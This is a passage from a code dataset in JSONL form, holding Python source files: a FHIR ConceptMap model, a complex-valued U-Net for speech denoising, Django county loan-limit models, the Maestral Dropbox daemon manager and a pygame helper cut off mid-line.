description=(\n \"Defines which action to take if there is no match for the source \"\n \"concept in the target system designated for the group. One of 3 \"\n \"actions are possible: use the unmapped code (this is useful when doing\"\n \" a mapping between versions, and only a few codes have changed), use a\"\n \" fixed code (a default code), or alternatively, a reference to a \"\n \"different concept map can be provided (by canonical URL).\"\n ),\n # if property is element of this resource.\n element_property=True,\n element_required=True,\n # note: Enum values can be used in validation,\n # but use in your own responsibilities, read official FHIR documentation.\n enum_values=[\"provided\", \"fixed\", \"other-map\"],\n )\n mode__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_mode\", title=\"Extension field for ``mode``.\"\n )\n\n url: fhirtypes.Canonical = Field(\n None,\n alias=\"url\",\n title=(\n \"canonical reference to an additional ConceptMap to use for mapping if \"\n \"the source concept is unmapped\"\n ),\n description=(\n \"The canonical reference to an additional ConceptMap resource instance \"\n \"to use for mapping if this ConceptMap resource contains no matching \"\n \"mapping for the source concept.\"\n ),\n # if property is element of this resource.\n element_property=True,\n # note: Listed Resource Type(s) should be allowed as Reference.\n enum_reference_types=[\"ConceptMap\"],\n )\n url__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_url\", title=\"Extension field for ``url``.\"\n )\n\n @classmethod\n def elements_sequence(cls):\n \"\"\"returning all elements names from\n ``ConceptMapGroupUnmapped`` according specification,\n with preserving original sequence order.\n \"\"\"\n return [\n \"id\",\n \"extension\",\n \"modifierExtension\",\n \"mode\",\n \"code\",\n \"display\",\n \"url\",\n ]\n\n @root_validator(pre=True, allow_reuse=True)\n def validate_required_primitive_elements_2520(\n cls, values: typing.Dict[str, typing.Any]\n ) -> typing.Dict[str, typing.Any]:\n \"\"\"https://www.hl7.org/fhir/extensibility.html#Special-Case\n In some cases, implementers might find that they do not have appropriate data for\n an element with minimum cardinality = 1. In this case, the element must be present,\n but unless the resource or a profile on it has made the actual value of the primitive\n data type mandatory, it is possible to provide an extension that explains why\n the primitive value is not present.\n \"\"\"\n required_fields = [(\"mode\", \"mode__ext\")]\n _missing = object()\n\n def _fallback():\n return \"\"\n\n errors: typing.List[\"ErrorWrapper\"] = []\n for name, ext in required_fields:\n field = cls.__fields__[name]\n ext_field = cls.__fields__[ext]\n value = values.get(field.alias, _missing)\n if value not in (_missing, None):\n continue\n ext_value = values.get(ext_field.alias, _missing)\n missing_ext = True\n if ext_value not in (_missing, None):\n if isinstance(ext_value, dict):\n missing_ext = len(ext_value.get(\"extension\", [])) == 0\n elif (\n getattr(ext_value.__class__, \"get_resource_type\", _fallback)()\n == \"FHIRPrimitiveExtension\"\n ):\n if ext_value.extension and len(ext_value.extension) > 0:\n missing_ext = False\n else:\n validate_pass = True\n for validator in ext_field.type_.__get_validators__():\n try:\n ext_value = validator(v=ext_value)\n except ValidationError as exc:\n errors.append(ErrorWrapper(exc, loc=ext_field.alias))\n validate_pass = False\n if not validate_pass:\n continue\n if ext_value.extension and len(ext_value.extension) > 0:\n missing_ext = False\n if missing_ext:\n if value is _missing:\n errors.append(ErrorWrapper(MissingError(), loc=field.alias))\n else:\n errors.append(\n ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)\n )\n if len(errors) > 0:\n raise ValidationError(errors, cls) # type: ignore\n\n return values\n","sub_path":"fhir/resources/R4B/conceptmap.py","file_name":"conceptmap.py","file_ext":"py","file_size_in_byte":45816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"157753147","text":"\"\"\" Gliffy Backup User Interface\n @author: Jean-Lou Dupont\n\"\"\"\n\n__author__ = \"Jean-Lou Dupont\"\n__version__ = \"$Id: gliffy_ui.py 795 2009-01-13 19:42:53Z JeanLou.Dupont $\"\n\nimport jld.tools.cmd_ui as ui\n\nclass Gliffy_UI(ui.UIBase):\n \"\"\" Handles user interface\n \"\"\"\n _map = {\n 'jld.api.ErrorConfig': { 'msg': 'error_config', 'help': 'help_config', },\n 'jld.api.ErrorDb': { 'msg': 'error_db', 'help': 'help_db', },\n 'jld.api.ErrorAuth': { 'msg': 'error_auth', 'help': 'help_auth', },\n 'jld.api.ErrorNetwork': { 'msg': 'error_network', 'help': 'help_network', },\n 'jld.api.ErrorAccess': { 'msg': 'error_access', 'help': 'help_access', },\n 'jld.api.ErrorMethod': { 'msg': 'error_method', 'help': 'help_method', },\n 'jld.api.ErrorValidation': { 'msg': 'error_validation','help': 'help_validation', },\n 'jld.api.ErrorProtocol': { 'msg': 'error_protocol', 'help': 'help_protocol', },\n 'jld.api.ErrorInvalidCommand': { 'msg': 'error_command', 'help': 'help_command', },\n 'jld.registry.exception.RegistryException':{ 'msg': 'error_registry', 'help_win': 'help_registry_win', 'help_nix':'help_registry_nix' },\n }\n ","sub_path":"trunk/libs/python/jld/jld/backup/gliffy_ui.py","file_name":"gliffy_ui.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"568302814","text":"import torch\nimport torch.nn.functional as F\nfrom torch import nn\n\n\nclass CConv2d(nn.Module):\n \"\"\"\n Class of complex valued convolutional layer\n \"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size, stride, padding=0):\n super().__init__()\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = kernel_size\n self.padding = padding\n self.stride = stride\n\n self.real_conv = nn.Conv2d(in_channels=self.in_channels,\n out_channels=self.out_channels,\n kernel_size=self.kernel_size,\n padding=self.padding,\n stride=self.stride)\n\n self.im_conv = nn.Conv2d(in_channels=self.in_channels,\n out_channels=self.out_channels,\n kernel_size=self.kernel_size,\n padding=self.padding,\n stride=self.stride)\n\n # Glorot initialization.\n nn.init.xavier_uniform_(self.real_conv.weight)\n nn.init.xavier_uniform_(self.im_conv.weight)\n\n def forward(self, x):\n x_real = x[..., 0]\n x_im = x[..., 1]\n\n c_real = self.real_conv(x_real) - self.im_conv(x_im)\n c_im = self.im_conv(x_real) + self.real_conv(x_im)\n\n output = torch.stack([c_real, c_im], dim=-1)\n return output\n\n\nclass CConvTranspose2d(nn.Module):\n \"\"\"\n Class of complex valued dilation convolutional layer\n \"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size, stride, output_padding=0, padding=0):\n super().__init__()\n\n self.in_channels = in_channels\n\n self.out_channels = out_channels\n self.kernel_size = kernel_size\n self.output_padding = output_padding\n self.padding = padding\n self.stride = stride\n\n self.real_convt = nn.ConvTranspose2d(in_channels=self.in_channels,\n out_channels=self.out_channels,\n kernel_size=self.kernel_size,\n output_padding=self.output_padding,\n padding=self.padding,\n stride=self.stride)\n\n self.im_convt = nn.ConvTranspose2d(in_channels=self.in_channels,\n out_channels=self.out_channels,\n kernel_size=self.kernel_size,\n output_padding=self.output_padding,\n padding=self.padding,\n stride=self.stride)\n\n # Glorot initialization.\n nn.init.xavier_uniform_(self.real_convt.weight)\n nn.init.xavier_uniform_(self.im_convt.weight)\n\n def forward(self, x):\n x_real = x[..., 0]\n x_im = x[..., 1]\n\n ct_real = self.real_convt(x_real) - self.im_convt(x_im)\n ct_im = self.im_convt(x_real) + self.real_convt(x_im)\n\n output = torch.stack([ct_real, ct_im], dim=-1)\n return output\n\n\nclass CBatchNorm2d(nn.Module):\n \"\"\"\n Class of complex valued batch normalization layer\n \"\"\"\n\n def __init__(self, num_features, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True):\n super().__init__()\n\n self.num_features = num_features\n self.eps = eps\n self.momentum = momentum\n self.affine = affine\n self.track_running_stats = track_running_stats\n\n self.real_b = nn.BatchNorm2d(num_features=self.num_features, eps=self.eps, momentum=self.momentum,\n affine=self.affine, track_running_stats=self.track_running_stats)\n self.im_b = nn.BatchNorm2d(num_features=self.num_features, eps=self.eps, momentum=self.momentum,\n affine=self.affine, track_running_stats=self.track_running_stats)\n\n def forward(self, x):\n x_real = x[..., 0]\n x_im = x[..., 1]\n\n n_real = self.real_b(x_real)\n n_im = self.im_b(x_im)\n\n output = torch.stack([n_real, n_im], dim=-1)\n return output\n\n\nclass Encoder(nn.Module):\n \"\"\"\n Class of upsample block\n \"\"\"\n\n def __init__(self, filter_size=(7, 5), stride_size=(2, 2), in_channels=1, out_channels=45, padding=(0, 0)):\n super().__init__()\n\n self.filter_size = filter_size\n self.stride_size = stride_size\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.padding = padding\n\n self.cconv = CConv2d(in_channels=self.in_channels, out_channels=self.out_channels,\n kernel_size=self.filter_size, stride=self.stride_size, padding=self.padding)\n\n self.cbn = CBatchNorm2d(num_features=self.out_channels)\n\n self.leaky_relu = nn.LeakyReLU()\n\n def forward(self, x):\n conved = self.cconv(x)\n normed = self.cbn(conved)\n acted = self.leaky_relu(normed)\n\n return acted\n\n\nclass Decoder(nn.Module):\n \"\"\"\n Class of downsample block\n \"\"\"\n\n def __init__(self, filter_size=(7, 5), stride_size=(2, 2), in_channels=1, out_channels=45,\n output_padding=(0, 0), padding=(0, 0), last_layer=False):\n super().__init__()\n\n self.filter_size = filter_size\n self.stride_size = stride_size\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.output_padding = output_padding\n self.padding = padding\n\n self.last_layer = last_layer\n\n self.cconvt = CConvTranspose2d(in_channels=self.in_channels, out_channels=self.out_channels,\n kernel_size=self.filter_size, stride=self.stride_size,\n output_padding=self.output_padding, padding=self.padding)\n\n self.cbn = CBatchNorm2d(num_features=self.out_channels)\n\n self.leaky_relu = nn.LeakyReLU()\n\n def forward(self, x):\n\n conved = self.cconvt(x)\n\n if not self.last_layer:\n normed = self.cbn(conved)\n output = self.leaky_relu(normed)\n else:\n m_phase = conved / (torch.abs(conved) + 1e-8)\n m_mag = torch.tanh(torch.abs(conved))\n output = m_phase * m_mag\n\n return output\n\n\nclass DCUnet10(nn.Module):\n \"\"\"\n Deep Complex U-Net class of the model.\n \"\"\"\n\n def __init__(self, n_fft=64, hop_length=16):\n super().__init__()\n\n # for istft\n self.n_fft = n_fft\n self.hop_length = hop_length\n\n # downsampling/encoding\n self.downsample0 = Encoder(filter_size=(7, 5), stride_size=(2, 2), in_channels=1, out_channels=45)\n self.downsample1 = Encoder(filter_size=(7, 5), stride_size=(2, 2), in_channels=45, out_channels=90)\n self.downsample2 = Encoder(filter_size=(5, 3), stride_size=(2, 2), in_channels=90, out_channels=90)\n self.downsample3 = Encoder(filter_size=(5, 3), stride_size=(2, 2), in_channels=90, out_channels=90)\n self.downsample4 = Encoder(filter_size=(5, 3), stride_size=(2, 1), in_channels=90, out_channels=90)\n\n # upsampling/decoding\n self.upsample0 = Decoder(filter_size=(5, 3), stride_size=(2, 1), in_channels=90, out_channels=90)\n self.upsample1 = Decoder(filter_size=(5, 3), stride_size=(2, 2), in_channels=180, out_channels=90,\n output_padding=(0, 0))\n self.upsample2 = Decoder(filter_size=(5, 3), stride_size=(2, 2), in_channels=180, out_channels=90)\n self.upsample3 = Decoder(filter_size=(7, 5), stride_size=(2, 2), in_channels=180, out_channels=45,\n output_padding=(0, 0))\n self.upsample4 = Decoder(filter_size=(7, 5), stride_size=(2, 2), in_channels=90, output_padding=(0, 1),\n out_channels=1, last_layer=True)\n\n def forward(self, x, is_istft=True):\n\n # print(x.shape)\n x = torch.stft(input=x, n_fft=self.n_fft,\n hop_length=self.hop_length, normalized=True)\n x = x.narrow(2, 0, x.shape[2] - 1)\n x = x.unsqueeze(1)\n # print(x.shape)\n\n # downsampling/encoding\n d0 = self.downsample0(x)\n d1 = self.downsample1(d0)\n d2 = self.downsample2(d1)\n d3 = self.downsample3(d2)\n d4 = self.downsample4(d3)\n\n # upsampling/decoding\n u0 = self.upsample0(d4)\n # skip-connection\n c0 = torch.cat((u0, d3), dim=1)\n\n u1 = self.upsample1(c0)\n c1 = torch.cat((u1, d2), dim=1)\n\n u2 = self.upsample2(c1)\n c2 = torch.cat((u2, d1), dim=1)\n\n u3 = self.upsample3(c2)\n c3 = torch.cat((u3, d0), dim=1)\n\n u4 = self.upsample4(c3)\n\n # u4 - the mask\n if x.shape[3] < u4.shape[3]:\n x = F.pad(x, (0, 0, 0, 1))\n if u4.shape[3] < x.shape[3]:\n x = x.narrow(3, 0, u4.shape[3])\n # print(u4.shape, x.shape)\n output = u4 * x\n if is_istft:\n output = torch.squeeze(output, 1)\n output = torch.istft(output, n_fft=self.n_fft, hop_length=self.hop_length, normalized=True)\n\n return output\n","sub_path":"dcunet/dcunet.py","file_name":"dcunet.py","file_ext":"py","file_size_in_byte":9355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"540580021","text":"from django.db import models\nfrom localflavor.us.models import USStateField\nfrom localflavor.us.us_states import STATE_CHOICES\n\n\nabbr_to_name = dict(STATE_CHOICES)\n\n\"\"\" We are using Federal Information Processing Standard (FIPS) state and county codes.\n More information can be found in the following articles:\n http://en.wikipedia.org/wiki/Federal_Information_Processing_Standard_state_code\n http://en.wikipedia.org/wiki/FIPS_county_code \"\"\"\n\n\nclass State(models.Model):\n \"\"\" A basic State object. \"\"\"\n state_fips = models.CharField(max_length=2, help_text='A two-digit FIPS code for the state')\n state_abbr = USStateField(help_text='A two-letter state abbreviation')\n\n def __unicode__(self):\n return u'%s' % abbr_to_name[self.state_abbr]\n\n\nclass County(models.Model):\n \"\"\" A basic state county object. \"\"\"\n county_fips = models.CharField(max_length=3, help_text='A three-digit FIPS code for the state\\'s county')\n county_name = models.CharField(max_length=100, help_text='The county name')\n state = models.ForeignKey(State)\n\n def __unicode__(self):\n return u'%s (%s)' % (self.county_name, self.county_fips)\n\n\nclass CountyLimit(models.Model):\n \"\"\" County limit object. \"\"\"\n fha_limit = models.DecimalField(\n max_digits=12,\n decimal_places=2,\n help_text='Federal Housing Administration loan lending limit for the county')\n gse_limit = models.DecimalField(\n max_digits=12,\n decimal_places=2,\n help_text='Loan limit for mortgages acquired by the Government-Sponsored Enterprises')\n va_limit = models.DecimalField(\n max_digits=12,\n decimal_places=2,\n help_text='The Department of Veterans Affairs loan guaranty program limit')\n county = models.OneToOneField(County)\n\n def __unicode__(self):\n return u'CountyLimit %s' % self.id\n\n @staticmethod\n def county_limits_by_state(state):\n \"\"\" Get a list of state counties with limits. \"\"\"\n data = []\n # state value can be a State FIPS or a state abbr.\n result = County.objects.filter(models.Q(state__state_fips=state) | models.Q(state__state_abbr=state))\n counties = {}\n state_abbr = ''\n state_fips = ''\n for county in result:\n if not state_abbr:\n state_abbr = county.state.state_abbr\n state_fips = county.state.state_fips\n counties[county.id] = {\n 'county_name': county.county_name,\n 'county_fips': county.county_fips\n }\n\n result = CountyLimit.objects.filter(models.Q(county__state__state_fips=state) | models.Q(county__state__state_abbr=state))\n for countylimit in result:\n data.append({\n 'state': abbr_to_name[state_abbr],\n 'county': counties[countylimit.county_id]['county_name'],\n 'complete_fips': '%s%s' % (state_fips, counties[countylimit.county_id]['county_fips']),\n 'gse_limit': countylimit.gse_limit,\n 'fha_limit': countylimit.fha_limit,\n 'va_limit': countylimit.va_limit,\n })\n return data\n","sub_path":"countylimits/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"620778796","text":"import sys, os\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nc=52\na=np.load('tica_all.npy')\nb=np.arange(0,len(a[c]),1)*0.1\nplt.figure(figsize=(3.3,3))\nplt.plot(a[c][:,0],b,color='black',ms=1,linewidth=0.4)\nplt.xticks(fontsize=6)\nplt.yticks(fontsize=6)\nplt.xlim(-2.1,1.2)\n#plt.savefig('tica1_trace.pdf')\nplt.show()\n","sub_path":"MSM/plot_tICA/plot_trace.py","file_name":"plot_trace.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"425072248","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Sam Schott (ss2151@cam.ac.uk)\n\n(c) Sam Schott; This work is licensed under a Creative Commons\nAttribution-NonCommercial-NoDerivs 2.0 UK: England & Wales License.\n\nThis module defines functions to start and stop the sync daemon and retrieve proxy objects\nfor a running daemon.\n\n\"\"\"\n# system imports\nimport sys\nimport os\nimport time\nimport logging\nimport signal\nimport traceback\nimport enum\n\n# external imports\nimport Pyro5.errors\nfrom Pyro5.api import Daemon, Proxy, expose, oneway\nfrom Pyro5.serializers import SerpentSerializer\nfrom lockfile.pidlockfile import PIDLockFile, AlreadyLocked, LockTimeout\n\n# local imports\nfrom maestral.errors import MaestralApiError, SYNC_ERRORS, FATAL_ERRORS\n\n\n_threads = dict()\n\n\nlogger = logging.getLogger(__name__)\nURI = 'PYRO:maestral.{0}@{1}'\n\n\nclass Exit(enum.Enum):\n \"\"\"Enumeration of daemon exit results.\"\"\"\n Ok = 0\n Killed = 1\n NotRunning = 2\n Failed = 3\n\n\nclass Start(enum.Enum):\n \"\"\"Enumeration of daemon start results.\"\"\"\n Ok = 0\n AlreadyRunning = 1\n Failed = 2\n\n\n# ==== error serialization ===============================================================\n\ndef serpent_deserialize_api_error(class_name, d):\n \"\"\"\n Deserializes a :class:`errors.MaestralApiError`.\n\n :param str class_name: Name of class to deserialize.\n :param dict d: Dictionary of serialized class.\n :returns: Class instance.\n :rtype: :class:`errors.MaestralApiError`\n \"\"\"\n # import maestral errors for evaluation\n import maestral.errors # noqa: F401\n\n cls = eval(class_name)\n err = cls(*d['args'])\n for a_name, a_value in d['attributes'].items():\n setattr(err, a_name, a_value)\n\n return err\n\n\nfor err_cls in list(SYNC_ERRORS) + list(FATAL_ERRORS) + [MaestralApiError]:\n SerpentSerializer.register_dict_to_class(\n err_cls.__module__ + '.' + err_cls.__name__,\n serpent_deserialize_api_error\n )\n\n\n# ==== helpers for daemon management =====================================================\n\ndef _sigterm_handler(signal_number, frame):\n sys.exit()\n\n\ndef _send_term(pid):\n try:\n os.kill(pid, signal.SIGTERM)\n except ProcessLookupError:\n pass\n\n\ndef _process_exists(pid):\n try:\n os.kill(pid, signal.SIG_DFL)\n return True\n except ProcessLookupError:\n return False\n\n\ndef sockpath_for_config(config_name):\n \"\"\"\n Returns the unix socket location to be used for the config. This should default to\n the apps runtime directory + '/maestral/CONFIG_NAME.sock'.\n \"\"\"\n from maestral.utils.appdirs import get_runtime_path\n return get_runtime_path('maestral', config_name + '.sock')\n\n\ndef pidpath_for_config(config_name):\n from maestral.utils.appdirs import get_runtime_path\n return get_runtime_path('maestral', config_name + '.pid')\n\n\ndef is_pidfile_stale(pidfile):\n \"\"\"\n Determine whether a PID file is stale. Returns ``True`` if the PID file is stale,\n ``False`` otherwise. The PID file is stale if its contents are valid but do not\n match the PID of a currently-running process.\n \"\"\"\n result = False\n\n pid = pidfile.read_pid()\n if pid:\n return not _process_exists(pid)\n else:\n return result\n\n\ndef get_maestral_pid(config_name):\n \"\"\"\n Returns Maestral's PID if the daemon is running, ``None`` otherwise.\n\n :param str config_name: The name of the Maestral configuration to use.\n :returns: The daemon's PID.\n :rtype: int\n \"\"\"\n\n lockfile = PIDLockFile(pidpath_for_config(config_name))\n pid = lockfile.read_pid()\n\n if pid and not is_pidfile_stale(lockfile):\n return pid\n else:\n lockfile.break_lock()\n\n\ndef _wait_for_startup(config_name, timeout=8):\n \"\"\"Waits for the daemon to start and verifies Pyro communication. Returns ``Start.Ok``\n if startup and communication succeeds within timeout, ``Start.Failed`` otherwise.\"\"\"\n t0 = time.time()\n pid = None\n\n logger.debug(f'Waiting for process with pid {pid} to start.')\n\n while not pid and time.time() - t0 < timeout / 2:\n pid = get_maestral_pid(config_name)\n time.sleep(0.2)\n\n if pid:\n return _check_pyro_communication(config_name, timeout=int(timeout / 2))\n else:\n return Start.Failed\n\n\ndef _check_pyro_communication(config_name, timeout=2):\n \"\"\"Checks if we can communicate with the maestral daemon. Returns ``Start.Ok`` if\n communication succeeds within timeout, ``Start.Failed`` otherwise.\"\"\"\n\n sock_name = sockpath_for_config(config_name)\n maestral_daemon = Proxy(URI.format(config_name, './u:' + sock_name))\n\n # wait until we can communicate with daemon, timeout after :param:`timeout`\n while timeout > 0:\n try:\n maestral_daemon._pyroBind()\n logger.debug('Successfully communication with daemon')\n return Start.Ok\n except Exception:\n time.sleep(0.2)\n timeout -= 0.2\n finally:\n maestral_daemon._pyroRelease()\n\n logger.error('Could not communicate with Maestral daemon')\n return Start.Failed\n\n\n# ==== main functions to manage daemon ===================================================\n\ndef run_maestral_daemon(config_name='maestral', run=True, log_to_stdout=False):\n \"\"\"\n Wraps :class:`main.Maestral` as Pyro daemon object, creates a new instance and starts\n Pyro's event loop to listen for requests on a unix domain socket. This call will block\n until the event loop shuts down.\n\n This command will return silently if the daemon is already running.\n\n :param str config_name: The name of the Maestral configuration to use.\n :param bool run: If ``True``, start syncing automatically. Defaults to ``True``.\n :param bool log_to_stdout: If ``True``, write logs to stdout. Defaults to ``False``.\n \"\"\"\n import threading\n from maestral.main import Maestral\n\n sock_name = sockpath_for_config(config_name)\n pid_name = pidpath_for_config(config_name)\n\n lockfile = PIDLockFile(pid_name)\n\n if threading.current_thread() is threading.main_thread():\n signal.signal(signal.SIGTERM, _sigterm_handler)\n\n # acquire PID lock file\n\n try:\n lockfile.acquire(timeout=1)\n except (AlreadyLocked, LockTimeout):\n if is_pidfile_stale(lockfile):\n lockfile.break_lock()\n else:\n logger.debug(f'Maestral already running')\n return\n\n # Nice ourselves give other processes priority. We will likely only\n # have significant CPU usage in case of many concurrent downloads.\n os.nice(10)\n\n logger.debug(f'Starting Maestral daemon on socket \"{sock_name}\"')\n\n try:\n # clean up old socket\n try:\n os.remove(sock_name)\n except FileNotFoundError:\n pass\n\n daemon = Daemon(unixsocket=sock_name)\n\n # expose maestral as Pyro server\n # convert selected methods to one way calls so that they don't block\n ExposedMaestral = expose(Maestral)\n\n ExposedMaestral.stop_sync = oneway(ExposedMaestral.stop_sync)\n ExposedMaestral.pause_sync = oneway(ExposedMaestral.pause_sync)\n ExposedMaestral.shutdown_pyro_daemon = oneway(ExposedMaestral.shutdown_pyro_daemon)\n\n m = ExposedMaestral(config_name, run=run, log_to_stdout=log_to_stdout)\n\n daemon.register(m, f'maestral.{config_name}')\n daemon.requestLoop(loopCondition=m._loop_condition)\n daemon.close()\n except Exception:\n traceback.print_exc()\n except (KeyboardInterrupt, SystemExit):\n logger.info('Received system exit')\n sys.exit(0)\n finally:\n lockfile.release()\n\n\ndef start_maestral_daemon_thread(config_name='maestral', run=True, log_to_stdout=False):\n \"\"\"\n Starts the Maestral daemon in a thread (by calling :func:`start_maestral_daemon`).\n This command will create a new daemon on each run. Take care not to sync the same\n directory with multiple instances of Meastral! You can use\n :func:`get_maestral_process_info` to check if either a Meastral gui or daemon is\n already running for the given ``config_name``.\n\n :param str config_name: The name of the Maestral configuration to use.\n :param bool run: If ``True``, start syncing automatically. Defaults to ``True``.\n :param bool log_to_stdout: If ``True``, write logs to stdout. Defaults to ``False``.\n :returns: ``Start.Ok`` if successful, ``Start.AlreadyRunning`` if the daemon was\n already running or ``Start.Failed`` if startup failed.\n \"\"\"\n import threading\n\n t = threading.Thread(\n target=run_maestral_daemon,\n args=(config_name, run, log_to_stdout),\n name=f'maestral-daemon-{config_name}',\n daemon=True,\n )\n t.start()\n\n _threads[config_name] = t\n\n if threading.current_thread() is threading.main_thread():\n signal.signal(signal.SIGTERM, _sigterm_handler)\n\n return _wait_for_startup(config_name, timeout=8)\n\n\ndef start_maestral_daemon_process(config_name='maestral', run=True, log_to_stdout=False):\n \"\"\"\n Starts the Maestral daemon as a separate process by calling\n :func:`start_maestral_daemon`.\n\n .. warning::\n This function assumes that ``sys.executable`` points to the Python executable and\n will not work for instance from Pyinstaller executables.\n\n :param str config_name: The name of the Maestral configuration to use.\n :param bool run: If ``True``, start syncing automatically. Defaults to ``True``.\n :param bool log_to_stdout: If ``True``, write logs to stdout. Defaults to ``False``.\n :returns: ``Start.Ok`` if successful, ``Start.AlreadyRunning`` if the daemon was\n already running or ``Start.Failed`` if startup failed.\n \"\"\"\n import subprocess\n from shlex import quote\n import multiprocessing as mp\n\n STD_IN_OUT = subprocess.DEVNULL\n\n # use nested Popen and multiprocessing.Process to effectively create double fork`\n # see Unix 'double-fork magic'\n\n def target(cc, r):\n cc = quote(cc)\n r = bool(r)\n\n cmd = (f'import maestral.daemon; '\n f'maestral.daemon.run_maestral_daemon(\"{cc}\", {r}, {log_to_stdout})')\n\n subprocess.Popen(\n [sys.executable, '-c', cmd],\n stdin=STD_IN_OUT, stdout=STD_IN_OUT, stderr=STD_IN_OUT,\n )\n\n mp.Process(\n target=target,\n args=(config_name, run),\n name='maestral-daemon-launcher',\n daemon=True,\n ).start()\n\n return _wait_for_startup(config_name, timeout=8)\n\n\ndef stop_maestral_daemon_process(config_name='maestral', timeout=10):\n \"\"\"Stops a maestral daemon process by finding its PID and shutting it down.\n\n This function first tries to shut down Maestral gracefully. If this fails, it will\n send SIGTERM. If that fails as well, it will send SIGKILL to the process.\n\n :param str config_name: The name of the Maestral configuration to use.\n :param float timeout: Number of sec to wait for daemon to shut down before killing it.\n :returns: ``Exit.Ok`` if successful, ``Exit.Killed`` if killed and ``Exit.NotRunning``\n if the daemon was not running.\n \"\"\"\n\n logger.debug('Stopping daemon')\n lockfile = PIDLockFile(pidpath_for_config(config_name))\n pid = lockfile.read_pid()\n\n try:\n if not pid or not _process_exists(pid):\n return Exit.NotRunning\n\n try:\n with MaestralProxy(config_name) as m:\n m.stop_sync()\n m.shutdown_pyro_daemon()\n except Pyro5.errors.CommunicationError:\n logger.debug('Could not communicate with daemon, sending SIGTERM')\n _send_term(pid)\n finally:\n logger.debug('Waiting for shutdown')\n while timeout > 0:\n if not _process_exists(pid):\n logger.debug('Daemon shut down')\n return Exit.Ok\n else:\n time.sleep(0.2)\n timeout -= 0.2\n\n # send SIGTERM after timeout and delete PID file\n _send_term(pid)\n\n time.sleep(1)\n\n if not _process_exists(pid):\n logger.debug('Daemon shut down')\n return Exit.Ok\n else:\n os.kill(pid, signal.SIGKILL)\n logger.debug('Daemon killed')\n return Exit.Killed\n finally:\n lockfile.break_lock()\n\n\ndef stop_maestral_daemon_thread(config_name='maestral', timeout=10):\n \"\"\"Stops a maestral daemon thread without killing the parent process.\n\n :param str config_name: The name of the Maestral configuration to use.\n :param float timeout: Number of sec to wait for daemon to shut down before killing it.\n :returns: ``Exit.Ok`` if successful,``Exit.NotRunning`` if the daemon was not running,\n ``Exit.Failed`` if it could not be stopped within timeout.\n \"\"\"\n\n logger.debug('Stopping thread')\n lockfile = PIDLockFile(pidpath_for_config(config_name))\n t = _threads[config_name]\n\n if not t.is_alive():\n lockfile.break_lock()\n return Exit.NotRunning\n\n # tell maestral daemon to shut down\n try:\n with MaestralProxy(config_name) as m:\n m.stop_sync()\n m.shutdown_pyro_daemon()\n except Pyro5.errors.CommunicationError:\n return Exit.Failed\n\n # wait for maestral to carry out shutdown\n t.join(timeout=timeout)\n if t.is_alive():\n return Exit.Failed\n else:\n return Exit.Ok\n\n\ndef get_maestral_proxy(config_name='maestral', fallback=False):\n \"\"\"\n Returns a Pyro proxy of the a running Maestral instance.\n\n :param str config_name: The name of the Maestral configuration to use.\n :param bool fallback: If ``True``, a new instance of Maestral will be returned when\n the daemon cannot be reached. Defaults to ``False``.\n :returns: Pyro proxy of Maestral or a new instance.\n :raises: :class:`Pyro5.errors.CommunicationError` if the daemon cannot be reached and\n ``fallback`` is ``False``.\n \"\"\"\n\n pid = get_maestral_pid(config_name)\n\n if pid:\n sock_name = sockpath_for_config(config_name)\n\n sys.excepthook = Pyro5.errors.excepthook\n maestral_daemon = Proxy(URI.format(config_name, './u:' + sock_name))\n try:\n maestral_daemon._pyroBind()\n return maestral_daemon\n except Pyro5.errors.CommunicationError:\n maestral_daemon._pyroRelease()\n\n if fallback:\n from maestral.main import Maestral\n m = Maestral(config_name, run=False)\n m.log_handler_stream.setLevel(logging.CRITICAL)\n return m\n else:\n raise Pyro5.errors.CommunicationError\n\n\nclass MaestralProxy(object):\n \"\"\"A context manager to open and close a proxy to the Maestral daemon.\"\"\"\n\n def __init__(self, config_name='maestral', fallback=False):\n self.m = get_maestral_proxy(config_name, fallback)\n\n def __enter__(self):\n return self.m\n\n def __exit__(self, exc_type, exc_value, tb):\n if isinstance(self.m, Proxy):\n self.m._pyroRelease()\n\n del self.m\n","sub_path":"maestral/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":15083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"257979564","text":"import os\r\nimport math\r\nimport pygame\r\nimport pygame.gfxdraw\r\nimport numpy as np\r\n\r\n\r\nclass Object:\r\n def __init__(self):\r\n self.vars = {}\r\n self.childs = {}\r\n\r\n def Set(self, name, value):\r\n self.vars[name] = value\r\n\r\n def Get(self, name):\r\n if name in self.vars:\r\n return self.vars[name]\r\n return None\r\n\r\n def RenderAll(self, display):\r\n for key in self.childs:\r\n self.childs[key].Render(display)\r\n self.childs[key].RenderAll(display)\r\n\r\n def UpdateAll(self, display):\r\n for key in self.childs:\r\n self.childs[key].Update(display)\r\n self.childs[key].UpdateAll(display)\r\n\r\n def AddChild(self, *args):\r\n for arg in args:\r\n self.childs[arg[\"name\"]] = arg\r\n arg.Set(\"parent\", self)\r\n\r\n def GetChild(self, name):\r\n if name in self.childs:\r\n return self.childs[name]\r\n return None\r\n\r\n def RemoveChild(self, name):\r\n if name in self.childs:\r\n del self.childs[name]\r\n\r\n def __getitem__(self, index):\r\n if index in self.vars:\r\n return self.vars[index]\r\n return None\r\n\r\nclass Collision:\r\n @staticmethod\r\n def PointAABB(point, 